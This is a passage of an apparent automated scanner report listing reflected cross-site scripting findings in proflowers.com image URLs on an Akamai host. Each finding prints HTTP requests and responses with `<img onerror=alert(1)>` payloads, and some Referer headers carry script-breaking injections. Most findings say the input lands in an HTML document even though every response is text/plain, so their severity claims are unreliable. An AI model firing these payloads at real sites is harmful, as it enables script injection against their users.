User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:58 GMT
Connection: close

Unable to find /ProvideCommerce/PLTgdnabonsai2_PF9510f<img src=a onerror=alert(1)>aefbe9bcc3

4.134. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThibiscus_dkbsktyel09_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThibiscus_dkbsktyel09_l

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the server's 403 "Unable to find" response. The payload daa33<img%20src%3da%20onerror%3dalert(1)>f1e0c05c9d7 was submitted in REST URL parameter 9 and was echoed, URL-decoded, as daa33<img src=a onerror=alert(1)>f1e0c05c9d7.

The proof of concept shows that arbitrary markup, here an <img> element whose onerror handler would run JavaScript, can be placed in the response without encoding. The response is served as Content-Type: text/plain with no X-Content-Type-Options header, so a browser that honours the declared type will not parse it as HTML; the handler fires only in a client that sniffs the body as HTML, and any script that did run would execute in the a1128.g.akamai.net origin rather than in proflowers.com.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThibiscus_dkbsktyel09_ldaa33<img%20src%3da%20onerror%3dalert(1)>f1e0c05c9d7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/PLThibiscus_dkbsktyel09_ldaa33<img src=a onerror=alert(1)>f1e0c05c9d7

4.135. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload bab1d<img%20src%3da%20onerror%3dalert(1)>753a0dd4198 was submitted in the REST URL parameter 9. This input was echoed as bab1d<img src=a onerror=alert(1)>753a0dd4198 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PFbab1d<img%20src%3da%20onerror%3dalert(1)>753a0dd4198?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:08 GMT
Connection: close

Unable to find /ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PFbab1d<img src=a onerror=alert(1)>753a0dd4198

4.136. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7a739<img%20src%3da%20onerror%3dalert(1)>19e4b46ec9b was submitted in the REST URL parameter 9. This input was echoed as 7a739<img src=a onerror=alert(1)>19e4b46ec9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF7a739<img%20src%3da%20onerror%3dalert(1)>19e4b46ec9b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 117
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:04 GMT
Connection: close

Unable to find /ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF7a739<img src=a onerror=alert(1)>19e4b46ec9b

4.137. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload eb0f5<img%20src%3da%20onerror%3dalert(1)>e862abd4ade was submitted in the REST URL parameter 9. This input was echoed as eb0f5<img src=a onerror=alert(1)>e862abd4ade in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PFeb0f5<img%20src%3da%20onerror%3dalert(1)>e862abd4ade?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:58 GMT
Connection: close

Unable to find /ProvideCommerce/PLUMdayBearGodiva_FCB_PFeb0f5<img src=a onerror=alert(1)>e862abd4ade

4.138. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 58402<img%20src%3da%20onerror%3dalert(1)>acc34c808be was submitted in the REST URL parameter 9. This input was echoed as 58402<img src=a onerror=alert(1)>acc34c808be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF58402<img%20src%3da%20onerror%3dalert(1)>acc34c808be?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:00 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12red50_rbye11_PF58402<img src=a onerror=alert(1)>acc34c808be

4.139. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 40198<img%20src%3da%20onerror%3dalert(1)>c102b875793 was submitted in the REST URL parameter 9. This input was echoed as 40198<img src=a onerror=alert(1)>c102b875793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF40198<img%20src%3da%20onerror%3dalert(1)>c102b875793?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:46 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24assorted50_grn10_PF40198<img src=a onerror=alert(1)>c102b875793

4.140. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b5eda<img%20src%3da%20onerror%3dalert(1)>edca8607877 was submitted in the REST URL parameter 9. This input was echoed as b5eda<img src=a onerror=alert(1)>edca8607877 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PFb5eda<img%20src%3da%20onerror%3dalert(1)>edca8607877?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:06 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PFb5eda<img src=a onerror=alert(1)>edca8607877

4.141. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload efcb0<img%20src%3da%20onerror%3dalert(1)>e1c89bf3dc5 was submitted in the REST URL parameter 9. This input was echoed as efcb0<img src=a onerror=alert(1)>e1c89bf3dc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PFefcb0<img%20src%3da%20onerror%3dalert(1)>e1c89bf3dc5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=120&hei=140 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24assrt_pnk11_2_PFefcb0<img src=a onerror=alert(1)>e1c89bf3dc5

4.142. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dd052<img%20src%3da%20onerror%3dalert(1)>161137e8761 was submitted in the REST URL parameter 9. This input was echoed as dd052<img src=a onerror=alert(1)>161137e8761 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PFdd052<img%20src%3da%20onerror%3dalert(1)>161137e8761?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:46 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24assrtpet_grn10_PFdd052<img src=a onerror=alert(1)>161137e8761

4.143. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dd2be<img%20src%3da%20onerror%3dalert(1)>86af9b73a16 was submitted in the REST URL parameter 9. This input was echoed as dd2be<img src=a onerror=alert(1)>86af9b73a16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PFdd2be<img%20src%3da%20onerror%3dalert(1)>86af9b73a16?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:49 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24red40_rbye10_2_PFdd2be<img src=a onerror=alert(1)>86af9b73a16

4.144. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c2bf3<img%20src%3da%20onerror%3dalert(1)>1ee7bd55e21 was submitted in the REST URL parameter 9. This input was echoed as c2bf3<img src=a onerror=alert(1)>1ee7bd55e21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PFc2bf3<img%20src%3da%20onerror%3dalert(1)>1ee7bd55e21?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:01 GMT
Connection: close

Unable to find /ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PFc2bf3<img src=a onerror=alert(1)>1ee7bd55e21

4.145. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6ef1c<img%20src%3da%20onerror%3dalert(1)>f003a515b43 was submitted in the REST URL parameter 9. This input was echoed as 6ef1c<img src=a onerror=alert(1)>f003a515b43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF6ef1c<img%20src%3da%20onerror%3dalert(1)>f003a515b43?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:12 GMT
Connection: close

Unable to find /ProvideCommerce/SHB_EDY07_Berry24_PF6ef1c<img src=a onerror=alert(1)>f003a515b43

4.146. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4a901<img%20src%3da%20onerror%3dalert(1)>846a86c1b6f was submitted in the REST URL parameter 9. This input was echoed as 4a901<img src=a onerror=alert(1)>846a86c1b6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_14a901<img%20src%3da%20onerror%3dalert(1)>846a86c1b6f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:11 GMT
Connection: close

Unable to find /ProvideCommerce/SHB_EDY09_BRR10106_14a901<img src=a onerror=alert(1)>846a86c1b6f

4.147. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fc21b<img%20src%3da%20onerror%3dalert(1)>039a8b320c5 was submitted in the REST URL parameter 9. This input was echoed as fc21b<img src=a onerror=alert(1)>039a8b320c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1fc21b<img%20src%3da%20onerror%3dalert(1)>039a8b320c5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:59 GMT
Connection: close

Unable to find /ProvideCommerce/SHB_EDY09_BRR10112_1fc21b<img src=a onerror=alert(1)>039a8b320c5

4.148. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 318c3<img%20src%3da%20onerror%3dalert(1)>14ddc48f11f was submitted in the REST URL parameter 9. This input was echoed as 318c3<img src=a onerror=alert(1)>14ddc48f11f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ318c3<img%20src%3da%20onerror%3dalert(1)>14ddc48f11f?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 114
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:04 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ318c3<img src=a onerror=alert(1)>14ddc48f11f

4.149. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
